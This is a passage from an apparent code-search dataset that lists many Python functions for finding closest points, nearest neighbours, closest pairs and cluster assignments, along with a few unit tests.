centroids]\n distance = min(tup, key = lambda x:x[1])\n return (distance[0],coordinates)", "def closest_point(a, b, p):\n ap = [p[0]-a[0], p[1]-a[1]]\n ab = [b[0]-a[0], b[1]-a[1]]\n mag = float(ab[0]**2 + ab[1]**2)\n proj = dot(ap, ab)\n if mag ==0 :\n dist = 0\n else:\n dist = proj / mag\n if dist < 0:\n return [a[0], a[1]]\n elif dist > 1:\n return [b[0], b[1]]\n else:\n return [a[0] + ab[0] * dist, a[1] + ab[1] * dist]", "def closest(self, x, y):\n if self.direction == 'horizontal':\n p_pts = np.array([\n self.ax.transData.transform((p, 0))[0] for p in self.positions\n ])\n dist = abs(p_pts - x)\n else:\n p_pts = np.array([\n self.ax.transData.transform((0, p))[1] for p in self.positions\n ])\n dist = abs(p_pts - y)\n index = np.argmin(dist)\n return index, dist[index]", "def get_closest_points_2d(P1, P2):\r\n\r\n A_1 = []\r\n A_2 = []\r\n\r\n for p1_id in range(0,len(P1)):\r\n d_i = 100000\r\n d_f = 0\r\n\r\n Point = []\r\n\r\n for p2_id in range(0,len(P2)):\r\n d_f = euclidean_distance_2(P1[p1_id],P2[p2_id])\r\n\r\n if d_f < d_i:\r\n Point = P2[p2_id]\r\n d_i = d_f\r\n\r\n A_1.append(Point)\r\n A_2.append(d_i)\r\n\r\n return A_1, A_2", "def brute_force(points):\n if len(points) == 2:\n return points[0], points[1], calc_distance(points[0], points[1])\n\n return min(((pair[0], pair[1], calc_distance(pair[0], pair[1]))\n for pair in combinations(points, 2)), key=pair_key)", "def find_nearest_neighbors(p, points, k=5):\n dist = np.zeros(points.shape[0])\n for i in range(len(dist)):\n dist[i] = distance(p, points[i])\n ind = np.argsort(dist)\n return ind[0:k]", "def FindClosestPoint(self, ):\n ...", "def nearest(coordinate, coordinate_list, limit=None):\r\n distances = []\r\n coordinate_lat=coordinate[0]\r\n coordinate_lon=coordinate[1]\r\n for c in coordinate_list:\r\n if len(c)==5:\r\n distances.append( (distance(coordinate_lat, coordinate_lon, c[3][0], c[3][1]), c))\r\n else:\r\n distances.append( (distance(coordinate_lat, coordinate_lon, c[0], c[1]), c)) \r\n distances.sort()\r\n if limit:\r\n return distances[:limit]\r\n return distances", "def test_find_closest_waypoints_nearest(self):\n planner = WaypointPlanner(make_example_base_waypoints())\n\n planner.position = Vector3(0, 0, 0)\n waypoints = planner.find_closest_waypoints(1)\n self.assertEqual(1, len(waypoints))\n self.assertEqual(0, waypoints[0].pose.pose.position.x)\n self.assertEqual(0, waypoints[0].pose.pose.position.y)\n self.assertEqual(0, waypoints[0].pose.pose.position.z)\n\n planner.position = Vector3(0.9, 0.9, 0)\n waypoints = planner.find_closest_waypoints(2)\n self.assertEqual(2, len(waypoints))\n self.assertEqual(1, waypoints[0].pose.pose.position.x)\n self.assertEqual(1, waypoints[0].pose.pose.position.y)\n self.assertEqual(2, waypoints[1].pose.pose.position.x)\n self.assertEqual(2, waypoints[1].pose.pose.position.y)\n\n # Check it wraps back around to the start.\n planner.position = Vector3(0.9, 0.9, 0)\n waypoints = planner.find_closest_waypoints(3)\n self.assertEqual(3, len(waypoints))\n self.assertEqual(1, waypoints[0].pose.pose.position.x)\n self.assertEqual(1, waypoints[0].pose.pose.position.y)\n self.assertEqual(2, waypoints[1].pose.pose.position.x)\n self.assertEqual(2, waypoints[1].pose.pose.position.y)\n self.assertEqual(0, waypoints[2].pose.pose.position.x)\n self.assertEqual(0, waypoints[2].pose.pose.position.y)", "def find_closest(distances, threshold):\n n = len(distances)\n person_1 = []\n person_2 = []\n d = []\n\n for i in range(n):\n for j in range(i+1, n):\n if distances[i][j] <= threshold:\n person_1.append(i)\n person_2.append(j)\n d.append(distances[i][j])\n\n return person_1, person_2, d", "def closest_point(\n self, points: Union[List[\"PointMixin\"], \"PointMixin\"]\n ) -> pd.Series:\n from ..core.distance import closest_point as cp\n\n # The following cast secures the typing\n self = cast(\"Flight\", self)\n\n if not isinstance(points, list):\n points = [points]\n\n return min(\n (cp(self.data, point) for point in points),\n key=attrgetter(\"distance\"),\n )", "def nearest(reference, locations):\n return [x[1] for x in distances(reference, locations)]", "def _nearest_point_index(points, point):\n distance = sys.float_info.max\n index = None\n for i, p in enumerate(points):\n temp = _vec_distance(p, point)\n if temp < distance:\n distance = temp\n index = i\n return index, distance", "def closest_points(self, entity: _entity_types) -> Tuple[Point3D, Point3D]:\n self_body = _union_entities(self.bodies)\n other_body = _union_entities(entity)\n\n occ1 = _create_component(root(), self_body, name=\"temp\")\n occ2 = _create_component(root(), other_body, name=\"temp\")\n\n try:\n result = app().measureManager.measureMinimumDistance(occ1.bRepBodies[0], occ2.bRepBodies[0])\n return result.positionOne, result.positionTwo\n finally:\n occ1.deleteMe()\n occ2.deleteMe()", "def closest_point(self, point, start_param=None, Ns=25):\n x, z = self.rotate_to_xz_plane(point)\n la = self._closest_point(x, z, start_param, Ns)\n return la", "def point_with_min_y(points):\n\n\tmin_idx = None\n\n\tfor a,coord in enumerate(points):\n\n\t\tif min_idx == None:\n\t\t\tmin_idx = a\n\t\t\tP0_Y = coord[1]\n\t\t\tP0_X = coord[0]\n\t\telif coord[1] < P0_Y:\n\t\t\t# look for the point with lowest y co-ordinate\n\t\t\tmin_idx = a\n\t\t\tP0_X = coord[0]\n\t\t\tP0_Y = coord[1]\n\t\telif (coord[1] == P0_Y) & (coord[0] < P0_X):\n\t\t\t# In-case of tie with lowest y co-ordinate\n\t\t\t# take one which is leftmost or lowest x \n\t\t\t# co-ordinate\n\t\t\tmin_idx = a\n\t\t\tP0_X = coord[0]\n\t\t\tP0_Y = coord[1]\n\n\n\treturn (P0_X,P0_Y)", "def find_nearest_spot(this_coord, coord_list, scale_z, scale_xy):\n closest_sed = np.inf\n closest_spot = 0\n for test_data in coord_list:\n test_spot_id = test_data[0]\n test_coords = (test_data[1:4])\n sed = sq_euc_distance(test_coords, this_coord, scale_z, scale_xy)\n if (sed < closest_sed):\n closest_sed = sed\n closest_spot = test_spot_id\n closest_spot_coords = test_coords\n return closest_spot, np.sqrt(closest_sed), closest_spot_coords", "def slow_closest_pair(cluster_list):\n closest_pair = (float('inf'), -1, -1)\n index_list = range(len(cluster_list))\n\n for point_u in index_list:\n for point_v in index_list:\n if point_u != point_v:\n closest_pair = min(closest_pair,\n pair_distance(cluster_list, point_u, point_v))\n return closest_pair", "def find_nearest(obs_lat, obs_lon, lats, lons):\n point1 = Point(obs_lon, obs_lat)\n dist = 999999999\n index_i, index_j = -1, -1\n for i in range(0, len(lats)):\n for j in range(0, len(lons)):\n point2 = Point(lons[j], lats[i])\n val = point1.distance(point2)\n if val < dist:\n index_i = i\n index_j = j\n dist = val\n return [index_i, index_j, dist]", "def get_closest_neighbours(atomlist, neighbours=2):\n print('atomlist', atomlist)\n neighbourlist = []\n for atom in atomlist:\n listline = [atom[0][0]]\n dists = []\n distsc = []\n for partner in atomlist:\n dists.append(np.linalg.norm(atom[1] - partner[1]))\n distsc.append(np.linalg.norm(atom[1] - partner[1]))\n dists.remove(min(dists))\n for _ in range(neighbours):\n if min(dists) < 2.5:\n listline.append(atomlist[distsc.index(min(dists))][0][0])\n dists.remove(min(dists))\n #listline.append(atomlist[distsc.index(min(dists))][0][0])\n neighbourlist.append(listline)\n return neighbourlist", "def find_closest(a, b):\n a = np.atleast_1d(np.array(a))\n b = np.atleast_1d(np.array(b))\n out = [np.argmin(abs(b - a1)) for a1 in a]\n return out", "def nearestNeighbours(xObs, xMod):\n\n\txObs=np.asarray(xObs)\n\txMod=np.asarray(xMod)\n\tkept=np.copy(xMod)\n\tLObs=len(xObs)\n\tLMod=len(xMod)\n\txObs=np.expand_dims(xObs, axis=1)\n\txMod=np.expand_dims(xMod, axis=1)\n\txObs=np.repeat(xObs, LMod, axis=1)\n\txMod=np.repeat(xMod, LObs, axis=1)\n\txMod=xMod.T\n\tdiffs=xObs-xMod\n\t#interesting point: the smallest point (the one you are looking for) will be\n\t#the point just before the first negative value in a row\n\t#this could be used in an alternative method much to your advantage\n\ttemp=np.greater(diffs,0)\n\taltered=temp*diffs + np.invert(temp)*(10**30)\n\tmins=altered.min(1)\t\n\tmins=np.expand_dims(mins, axis=1)\n\tmins=np.repeat(mins, LMod, axis=1)\n\tplaced=np.equal(mins, diffs)*np.repeat(np.expand_dims(np.arange(0,LMod), axis=1), LObs, axis=1).T\n\tplaced1=np.sum(placed, axis=1)\n\tclosest1=kept[placed1]\n\tplaced2=np.add(placed1,1)\n\t#below deals with the fringe case; when there is no model x value greater than\n\t#a specific observation x value \n\ttemp=np.where(placed2 > (len(kept)-1))\n\tplaced2[temp]=placed2[temp]-1\n\tclosest2=kept[placed]\n\t#print(\"-----------------\")\n\t#print(closest1, closest2)\n\treturn placed1, placed2, closest1", "def kclosestpoints(points, k):\n dist = {p : 0 for p in points}\n for point in points:\n dist[point] = point[0] ** 2 + point[1] ** 2\n dist = sorted(dist.items(), key=lambda x : x[1], reverse=False)\n return dist[:k]", "def find_all_nearest_neighbours(point_cloud:np.ndarray) -> np.ndarray:\n pass", "def find_nearest_neighbors(p, points, k):\n\timport numpy as np\n\tdistances = np.zeros(points.shape[0])\n\tfor i in range(len(distances)):\n\t\tdistances[i] = distance(p,points[i])\n\tind = np.argsort(distances)\n\treturn ind[0:k]", "def fast_closest_pair(cluster_list):\n # sort in nondecreasing order of horizontal (x) coordinates\n cluster_list.sort(key=lambda cluster: cluster.horiz_center())\n\n # n <-- length(P);\n len_cluster = len(cluster_list)\n\n # if n <= 3 then\n if len_cluster <= 3:\n # (d,i,j) <== SlowClosestPair(P);\n output_list = slow_closest_pair(cluster_list)\n else:\n # m <-- leftbracketwithouttop n/2 rightbracketwithouttop\n middle_index = int(math.floor(len_cluster/2))\n # Psub L <-- {pi: 0 <= i <= m-1}; Pr <--{pi: m <= i <= n-1}; // Psub L and Pr are also sorted\n # (dL, iL, jL) <-- FastClosestPair(PL);\n # (dr, ir, jr) <-- FastClosestPair(Pr);\n left_output_list = fast_closest_pair(cluster_list[0:middle_index])\n right_output_list = fast_closest_pair(cluster_list[middle_index: len_cluster])\n \n output_list = min(left_output_list, (right_output_list[0], right_output_list[1]+middle_index, right_output_list[2]+middle_index))\n mid = 1/2.0*(cluster_list[middle_index-1].horiz_center()+cluster_list[middle_index].horiz_center())\n half_width = abs(cluster_list[-1].horiz_center()-cluster_list[0].horiz_center())\n output_list = min(output_list, closest_pair_strip(cluster_list, mid, half_width))\n\n return output_list", "def find_closest_pt(ref_lon, ref_lat, tlon, tlat):\n\n # compute great circle distance from location to model grid points\n dist = gc_dist(ref_lon, ref_lat, tlon, tlat)\n\n # find j index of closest grid point\n work = N.take(dist,N.argmin(dist,0),0).diagonal()\n jj = N.argsort(work)[0]\n\n # find i index of closest grid point\n work = N.take(dist,N.argmin(dist,1),1).diagonal()\n ii = N.argsort(work)[0]\n\n return ii, jj", "def slow_closest_pair(cluster_list):\n dist, idx1, idx2 = float(\"inf\"), -1, -1\n for idx_u in range(len(cluster_list)):\n for idx_v in range(len(cluster_list)):\n if idx_u != idx_v:\n dist_uv = pair_distance(cluster_list, idx_u, idx_v)\n dist, idx1, idx2 = min((dist, idx1, idx2), dist_uv)\n return (dist, idx1, idx2)", "def _get_closest(centers, features):\n pred_labels = []\n\n features = features\n for feature in features:\n distances = End2End._dist(centers, feature)\n pred_labels.append(distances.argmin().item())\n\n return np.array(pred_labels)", "def closest(self, x):\n # http://www.ahinson.com/algorithms_general/Sections/Geometry/PluckerLine.pdf\n # has different equation for moment, the negative\n\n x = arg.getvector(x, 3)\n\n lam = np.dot(x - self.pp, self.uw)\n p = self.point(lam) # is the closest point on the line\n d = np.linalg.norm( x - p)\n \n return namedtuple('closest', 'p d lam')(p, d, lam)", "def partner_find_closest(self, partners_data):\n distance = {}\n point = Point(self.lng, self.lat)\n for partner in partners_data:\n if 'coverageArea' in partner and 'coordinates' in partner['coverageArea']:\n for coordinates_array in partner['coverageArea']['coordinates']:\n for coordinates in coordinates_array:\n if partner['id'] in distance:\n dist = distance[partner['id']]\n dist.append(point.distance(Polygon(coordinates)))\n distance[partner['id']] = dist\n else:\n distance[partner['id']] = [point.distance(Polygon(coordinates))]\n key = min(distance, key=distance.get) if distance else None\n return next((partner for partner in partners_data if partner['id'] == key), None)", "def closest_point_to(self, x):\n x = np.array(x)\n v = self.p1 - self.p0\n b = self.p0 - x\n\n t = -np.dot(v, b) / np.dot(v, v)\n if (0 <= t <= 1):\n closest = t*(self.p1 - self.p0) + self.p0\n return closest\n else:\n if np.linalg.norm(x - self.p0) < np.linalg.norm(x - self.p1):\n return self.p0\n else:\n return self.p1", "def closest_coord(self, list, coord):\n\n closest = (0,0)\n second_closest = (0,0)\n for c in list:\n if self.distance(c, coord) < self.distance(closest, coord) and (c != coord):\n second_closest = closest\n closest = c\n #print(closest, coord)\n return (closest, second_closest)", "def assign_points(data_points, centers):\n assignments = []\n for point in data_points:\n shortest = 10000 # positive infinity\n shortest_index = 0\n for i in range(len(centers)):\n val = distance(point, centers[i])\n if val < shortest:\n shortest = val\n shortest_index = i\n assignments.append(shortest_index)\n return assignments", "def sort_points(point, cloud):\n minsq = [distance_point_point_sqrd(p, point) for p in cloud]\n return sorted(zip(minsq, cloud, range(len(cloud))), key=lambda x: x[0])", "def closest_point(p1: Vector3, p2: Vector3, p3: Vector3) -> Vector3:\n k = ((p2.y - p1.y) * (p3.x - p1.x) - (p2.x - p1.x) * (p3.y - p1.y)) / ((p2.y - p1.y) ** 2 + (p2.x - p1.x) ** 2)\n x4 = p3.x - k * (p2.y - p1.y)\n y4 = p3.y + k * (p2.x - p1.x)\n\n return Vector3(x4, y4, 0)", "def closestCentroids(self, points , centroids ):\n dists = scipy.spatial.distance.cdist(points,centroids)\n # 1 is dimension\n minIds = numpy.argmin(dists, 1)\n return minIds", "def find_closest(self, in_vector):\n proto_vectors = self.p_vectors\n closest = None\n position = ()\n closest_distance = 9999999\n for i in range(proto_vectors.shape[0]):\n for j in range(proto_vectors.shape[1]):\n distance = np.linalg.norm(in_vector - proto_vectors[i][j].p_vector)\n if distance < closest_distance:\n closest_distance = distance\n closest = proto_vectors[i][j]\n position = (i,j)\n return [position, closest]", "def getclosest_ij(lats,lons,latpt,lonpt):\n dist_lat = (lats-latpt)**2 # find squared distance of every point on grid\n dist_lon = (lons-lonpt)**2\n minindex_lat = dist_lat.argmin() # 1D index of minimum dist_sq element\n minindex_lon = dist_lon.argmin()\n return minindex_lat, minindex_lon # Get 2D index for latvals and lonvals arrays from 1D index", "def getclosest_ij(lats,lons,latpt,lonpt):\n dist_lat = (lats-latpt)**2 # find squared distance of every point on grid\n dist_lon = (lons-lonpt)**2\n minindex_lat = dist_lat.argmin() # 1D index of minimum dist_sq element\n minindex_lon = dist_lon.argmin()\n return minindex_lat, minindex_lon # Get 2D index for latvals and lonvals arrays from 1D index", "def FindBest(ax, x, npoints):\r\n\r\n # get size of data array (goes 0 to ndata-1)\r\n ndata = len(ax)\r\n\r\n # Find index of point closest to x\r\n iclosest = BSearch(ax,x)\r\n if (verbose): \r\n print 'looking for closest to x=',x\r\n print 'ax',ax\r\n print 'closest point at ',ax[iclosest],'iclosest=',iclosest\r\n \r\n # Get npoints points in each direction, and find distance \r\n # from x for each. \r\n # This will handle cases where point is at start or end of \r\n # data set, or where all closest points lie in one direction.\r\n imin = iclosest-npoints\r\n imax = iclosest+npoints\r\n # make sure imin and imax are in array range\r\n if (imin < 0): imin = 0\r\n if (imax >= ndata): imax = ndata-1\r\n ncandidates = imax-imin+1\r\n if (verbose):\r\n print 'imin,imax,ncandidates',imin,imax,ncandidates\r\n print 'candidate points:'\r\n print ' j,i,xdata[i],xdelta[j]:'\r\n xdelta = zeros(ncandidates,'d') # initialize array\r\n for i in range(imin,imax+1): # do i=imin,imax\r\n j = i-imin\r\n xdelta[j] = abs(ax[i]-x) # distance from x\r\n if (verbose): print ' ',j,i,ax[i],xdelta[j]\r\n \r\n # Sort points by xdelta, in ascending order\r\n ibest = IndexSort(xdelta)\r\n \r\n # Exclude closest point if it's actually the point we're searching for\r\n # (dr mayes requirement)\r\n npoints2 = npoints\r\n if (xdelta[ibest[0]] == 0.0):\r\n if (verbose): print 'excluding point with xdelta=0'\r\n # reduce number of available candidates by one\r\n ncandidates -=1\r\n # make sure we don't have more points than candidates\r\n npoints2 = ncandidates \r\n # shift candidates down by one\r\n for i in range(ncandidates): # do i=0,ncandidates-1\r\n ibest[i]=ibest[i+1]\r\n \r\n # trim the array down to the number of requested or available points\r\n# ibest.resize(npoints) # having trouble with this sometimes\r\n ibest = ibest[:npoints2]\r\n\r\n # adjust ibest array to correct range\r\n # note: at this point the first <npoints> is all we need\r\n# for i in range(npoints): # do i=0,npoints-1\r\n for i in range(npoints2): # do i=0,npoints-1\r\n ibest[i]=ibest[i]+imin\r\n \r\n if (verbose):\r\n print 'best points (sorted by xdelta):'\r\n print ' i,ibest,xdata,xdelta'\r\n# for i in range(npoints): # do i=0,npoints-1\r\n for i in range(npoints2): # do i=0,npoints-1\r\n print ' ',i,ibest[i],ax[ibest[i]],abs(x-ax[ibest[i]])\r\n \r\n return ibest", "def distances(points, l=2):\n distances = []\n while points:\n baseline = points.pop()\n distances.extend([distance(baseline, point, l) for point in points])\n return distances", "def furthest_right_point(list_of_points):\n return max(list_of_points, key = lambda pt: pt.getX())", "def test_k_nearest(self):\n L = range(100)\n L = [(i, i, i, i) for i in L]\n tree = KdTree(L)\n # remove distance, only keep points from the result\n items = lambda items: [x for (d, x) in items] \n assert items(tree.k_nearest((-1, -1), 1)) == [(0, 0, 0, 0)]\n assert items(tree.k_nearest((100, 100), 1)) == [(99, 99, 99, 99)]\n assert items(tree.k_nearest((50, 50), 1)) == [(50, 50, 50, 50)]\n assert items(tree.k_nearest((-1, -1), 2)) == [(0, 0, 0, 0),\n (1, 1, 1, 1)]", "def _assignment(points, Mu):\n # Calculate Distance matrix for the points to the given centroids Mu\n distance = [euclidian_distance([points, Mu[i]]) for i in Mu.keys()]\n closest = []\n # print(distance)\n # Get the closest centroid for every point using distance matrix\n for i in range(len(points[0])):\n _MIN, _INDEX = 10000, 100\n for j in range(len(Mu.keys())):\n # print(distance[j][i])\n if distance[j][i] < _MIN:\n _MIN = distance[j][i]\n _INDEX = j\n closest.append(_INDEX+1)\n return (closest)", "def get_surrounding_points(search_values, point_set):\n # http://stackoverflow.com/questions/2566412/find-nearest-value-in-numpy-array\n upper_indices = np.searchsorted(point_set, search_values, side=\"left\")\n n_points = len(point_set)\n n_search = len(search_values)\n neighbors = []\n for i in range(n_search):\n idx = upper_indices[i]\n val = search_values[i]\n if idx == 0:\n n = (point_set[0], point_set[0])\n elif idx == n_points:\n n = (point_set[-1], point_set[-1])\n else:\n n = (point_set[idx-1], point_set[idx])\n neighbors.append(n)\n\n return neighbors", "def closest_points(self, other):\n p0_other, p1_other = other.p0, other.p1\n\n # w = p1 - p0\n # v = p1_other - p0_other\n # s*w + p0 = t*v + p0_other\n\n w = self.p1 - self.p0\n v = p1_other - p0_other\n\n A = np.vstack((w,v)).T\n b = p0_other - self.p0\n\n #soln = np.linalg.solve(A, b)\n soln = np.linalg.pinv(A).dot(b)\n s, t = soln[0], -soln[1]\n\n return s*w + self.p0, t*v + p0_other", "def closest_centroid(x,centroids):\n\tK =len(centroids)\n\tN = len(x)\n\tDistance = np.zeros((N,K))\n\tfor j in range(K):\n\t\tmu = centroids[j]\n\t\tDistance[:,j] = np.linalg.norm(x-mu,axis=1)\n\tout = np.argmin(Distance,axis=1) \n\treturn out", "def _get_closest(self, x, y, clients):\n target = min(\n clients,\n key=lambda c: math.hypot(c.x - x, c.y - y),\n default=self.clients.current_client,\n )\n return target", "def minimum_distance(points_sorted_x, points_sorted_y, n):\n if n == 1:\n return 100000 # just return a big number\n elif n == 2:\n return euclidean_distance(points_sorted_x[0], points_sorted_x[1])\n elif n == 3:\n da = euclidean_distance(points_sorted_x[0], points_sorted_x[1])\n db = euclidean_distance(points_sorted_x[0], points_sorted_x[2])\n dc = euclidean_distance(points_sorted_x[1], points_sorted_x[2])\n return min(da, db, dc)\n\n m = floor(n/2)\n x_axis = (points_sorted_x[m - 1][0] + points_sorted_x[m][0]) / 2 # split the plane and solve each part separately.\n while points_sorted_x[m - 1][0] == points_sorted_x[m][0]:\n m += 1\n if m == n-1:\n break\n left_points_y_sorted = []\n right_points_y_sorted = []\n for point in points_sorted_y:\n if point[0] <= x_axis:\n left_points_y_sorted.append(point)\n else:\n right_points_y_sorted.append(point)\n\n d_left = minimum_distance(points_sorted_x[:m], left_points_y_sorted, m)\n d_right = minimum_distance(points_sorted_x[m:], right_points_y_sorted, n-m)\n d = np.min([d_left, d_right])\n strip_points, strip_size = strip(left_points_y_sorted, right_points_y_sorted, d, x_axis)\n for i in range(strip_size-1):\n for j in range(i+1, min(i+6, strip_size)): # check only up to the sixth point on the strip.\n d = min(d, euclidean_distance(strip_points[i], strip_points[j]))\n return d", "def _find_closest_shape_in_list(self, shapes, datum):\n closest_dist_yet = np.inf\n closest_shape = None\n for s in shapes:\n closest_point_data = s.find_closest_point_data(datum)\n if closest_point_data.distance < closest_dist_yet:\n closest_shape = s\n closest_dist_yet = closest_point_data.distance\n return closest_shape", "def find_nearest_DPRIPs (swrad,DPRIPs):\r\n s_pt = swrad.geometry\r\n new2d =[] \r\n for cood in s_pt: \r\n pt_2d = Point(cood.x,cood.y)\r\n new2d.append(pt_2d)\r\n s_pt = new2d\r\n ND_list = [] \r\n N_DPRIP = [] \r\n # for all DPRIPs \r\n for gp in zip(s_pt,DPRIPs):\r\n s = gp[0]\r\n DPRIP = gp[1]\r\n # Create empty list for storing distance \r\n all_dist = [] \r\n # check DPRIPs for each source \r\n for pt in DPRIP: \r\n if pt.type == \"MultiPoint\": \r\n split_pt = [(n.x, n.y) for n in pt]\r\n for spt in split_pt: \r\n npt = Point(spt)\r\n dist = npt.distance(s)\r\n all_dist.append(dist)\r\n else: \r\n dist = pt.distance(s)\r\n all_dist.append(dist)\r\n # find nearest intersection point index\r\n near_dist = min(all_dist)\r\n n_id = all_dist.index(near_dist)\r\n n_DPRIP = DPRIP[n_id]\r\n\r\n ND_list.append(near_dist)\r\n N_DPRIP.append(n_DPRIP)\r\n \r\n return ND_list,N_DPRIP", "def nearest_neighbor_within(others, point, max_distance):\n search_region = point.buffer(max_distance)\n interesting_points = search_region.intersection(MultiPoint(others))\n \n if not interesting_points:\n closest_point = None\n elif isinstance(interesting_points, Point):\n closest_point = interesting_points\n else: \n distances = [point.distance(ip) for ip in interesting_points\n if point.distance(ip) > 0]\n closest_point = interesting_points[distances.index(min(distances))]\n \n return closest_point", "def fast_closest_pair(cluster_list):\n \n def fast_helper(clist, h_order, v_order):\n \"\"\"\n Divide and conquer method for computing distance between closest pair of points\n Running time is O(n * log(n))\n h_order and v_order are lists of indices for clusters\n ordered horizontally and vertically\n Returns a tuple (distance, idx1, idx2) with idx1 < idx 2 where\n clist[idx1] and clist[idx2]\n have the smallest distance dist of any pair of clusters\n \"\"\"\n def _div(h_order):\n \"\"\"\n divide\n \"\"\"\n return int(math.ceil(len(h_order) / 2.0))\n\n # base case\n if len(h_order) <= 3:\n sublist = [clist[h_order[i]]\n for i in range(len(h_order))]\n res = slow_closest_pair(sublist)\n return res[0], h_order[res[1]], h_order[res[2]]\n\n # divide\n mid = 0.5 * (clist[h_order[_div(h_order) - 1]].horiz_center() +\n clist[h_order[_div(h_order)]].horiz_center())\n\n _hlr = h_order[0: _div(h_order)], h_order[_div(h_order): len(h_order)]\n min_d = min(fast_helper(clist, _hlr[0],\n [vi for vi in v_order if vi in frozenset(_hlr[0])]),\n fast_helper(clist, _hlr[1],\n [vi for vi in v_order if vi in frozenset(_hlr[1])]))\n\n # conquer\n sss = [vi for vi in v_order if\n abs(clist[vi].horiz_center() - mid) < min_d[0]]\n\n for _uuu in range(len(sss) - 1):\n for _vvv in range(_uuu + 1, min(_uuu + 4, len(sss))):\n dsuv = clist[sss[_uuu]].distance(clist[sss[_vvv]])\n min_d = min((min_d), (dsuv, sss[_uuu], sss[_vvv]))\n\n return min_d[0], min(min_d[1], min_d[2]), max(min_d[1], min_d[2])\n\n # compute list of indices for the clusters ordered in the horizontal direction\n hcoord_and_index = [(cluster_list[idx].horiz_center(), idx)\n for idx in range(len(cluster_list))]\n # print hcoord_and_index\n hcoord_and_index.sort()\n # print hcoord_and_index\n horiz_order = [hcoord_and_index[idx][1]\n for idx in range(len(hcoord_and_index))]\n\n # compute list of indices for the clusters ordered in vertical direction\n vcoord_and_index = [(cluster_list[idx].vert_center(), idx)\n for idx in range(len(cluster_list))]\n vcoord_and_index.sort()\n vert_order = [vcoord_and_index[idx][1]\n for idx in range(len(vcoord_and_index))]\n\n # compute answer recursively\n # print vert_order[0].real\n fast_helper(cluster_list, horiz_order, vert_order)\n answer = fast_helper(cluster_list, horiz_order, vert_order)\n # return slow_closest_pairs(cluster_list)\n return (answer[0], min(answer[1:]), max(answer[1:]))", "def _closest_point(self, x, z, start_param, Ns):\n pi = np.pi\n def f(t):\n px, pz = self(t)\n return np.sqrt((x-px)**2 + (z-pz)**2)\n if start_param is None:\n x0 = brute(lambda x: f(x[0]), [[0, pi]], Ns=Ns, finish=None)\n step = np.pi/(Ns-1)\n res = minimize_scalar(\n f, bounds=[max(0, x0-step), min(np.pi, x0+step)], method='bounded',\n options=dict(xatol=1e-12),\n )\n else:\n res = minimize_scalar(f, bracket=(start_param, pi/Ns),\n options=dict(xtol=1e-12))\n la = res.x\n return la", "def closest_split_pair(x, delta):\n mid_point_x = x[len(x)//2][0]\n strip = []\n\n for point in y:\n if abs(mid_point_x - point[0]) < delta:\n strip.append(point)\n strip = sorted(strip, key= lambda x: x[0])\n\n n = len(strip)\n min_distance = float(\"inf\")\n last_pair = None\n for i in range(n):\n for j in range(i+1, i+7):\n if j < n:\n result = distance(points[i], points[j])\n if result < min_distance:\n min_distance = result\n last_pair = [points[i], points[j]]\n return last_pair", "def slow_closest_pair(cluster_list):\n \n min_distance = set([(float('inf'), 0, 0)])\n\n for num_idx1 in xrange(len(cluster_list)):\n _node_idx1 = cluster_list[num_idx1]\n num_idx2 = num_idx1 + 1\n\n for _node_idx2 in cluster_list[num_idx2:]:\n new_distance = pair_distance(cluster_list, num_idx1, num_idx2)\n\n if list(new_distance)[0] < list(min_distance)[0][0]:\n min_distance = set([new_distance])\n elif list(new_distance)[0] == list(min_distance)[0][0]:\n min_distance.add(new_distance)\n num_idx2 += 1\n\n return min_distance.pop()", "def point_distances(src_points, gt_points):\n distances = EuclideanDistances(np.matrix(src_points), np.matrix(gt_points))\n return np.array(distances)", "def findNearset(x,y,lon,lat):\n dist = np.sqrt( (lon - x)**2 + (lat - y)**2)\n\n return np.argwhere(dist==dist.min())[0][0]", "def get_closest_offices(office_list, position):\n list_to_order = []\n for office in office_list:\n coord = [float(c) for c in office[\"Coordinates\"]]\n distance = math.sqrt(math.pow(position[0] - coord[0], 2) + math.pow(position[1] - coord[1], 2))\n list_to_order.append((office[\"Id\"], distance))\n\n ids = [k[0] for k in sorted(list_to_order, key=lambda x: x[1])]\n return [get_office_by_id(office_list, k) for k in ids if k is not None][:3]", "def closest_point(graph, point_3d):\n current_point = (point_3d[0], point_3d[1])\n closest_point = None\n dist = 100000\n for p in graph.nodes:\n d = LA.norm(np.array(p) - np.array(current_point))\n if d < dist:\n closest_point = p\n dist = d\n return closest_point", "def nearest_input_pts(\n in_latlons: ndarray, out_latlons: ndarray, k: int\n) -> Tuple[ndarray, ndarray]:\n # Convert input latitude and longitude to XYZ coordinates, then create KDtree\n in_x, in_y, in_z = ecef_coords(in_latlons[:, 0].flat, in_latlons[:, 1].flat)\n in_coords = np.c_[in_x, in_y, in_z]\n in_kdtree = KDTree(in_coords)\n # Convert output to XYZ and query the KDtree for nearby input points\n out_x, out_y, out_z = ecef_coords(out_latlons[:, 0].flat, out_latlons[:, 1].flat)\n out_coords = np.c_[out_x, out_y, out_z]\n distances, indexes = in_kdtree.query(out_coords, k)\n # Avoid single dimension output for k=1 case\n if distances.ndim == 1:\n distances = np.expand_dims(distances, axis=1)\n if indexes.ndim == 1:\n indexes = np.expand_dims(indexes, axis=1)\n return distances, indexes", "def find_best_reference_set(points):\n\n # Group points by color\n grouped = defaultdict(list)\n for point in points:\n grouped[point.color].append(point)\n\n # Brute force search on all combinations of points with unique colors\n possibilities = product(*[grouped[key] for key in grouped])\n return min(possibilities, key=summed_distances)", "def eeg_findnearest(x,X):\t\n\t#x array or vector and X a scalar\n\tabsdif = np.abs(x-X)\n\tval = np.min(absdif)\n\tidx = absdif.argmin()\n\treturn val,idx", "def closestClusterAndDistance(p, centers):\n\tbestIndex = 0\n closest = float(\"+inf\")\n for i in range(len(centers)):\n distance = np.sqrt(np.sum((np.array(p) - centers[i]) ** 2))\n if distance < closest:\n closest = distance\n bestIndex = i\n return (bestIndex, closest)", "def min_dist_grid(self, list_of_grids, self_pos):\n\t\t\n\t\tdistance = []\n\t\tcp_list_of_grids = list(list_of_grids)\n\t\t\n\n\t\tfor grid in cp_list_of_grids:\n\t\t\tdistance.append((dist(grid, self_pos), cp_list_of_grids.index(grid)))\n\t\tgrid_point = min(distance)\n\t\tidx = grid_point[1]\n\t\tpoint = cp_list_of_grids[idx]\n \t\n \t\tself_pos[0] = point[0]\n \t\tself_pos[1] = point[1]\n\n \t\tself.Bubble_last_pos = [point[0], point[1]]", "def slow_closest_pair(cluster_list):\n cl_copy = cluster_list[:]\n output_list = [99999, -1, -1]\n\n for index1 in range(len(cl_copy)):\n \tfor index2 in range(1,len(cl_copy)):\n \t\ttemp_dist = pair_distance(cl_copy, index1, index2)\n \t\tif output_list[0] > temp_dist[0] and index1 != 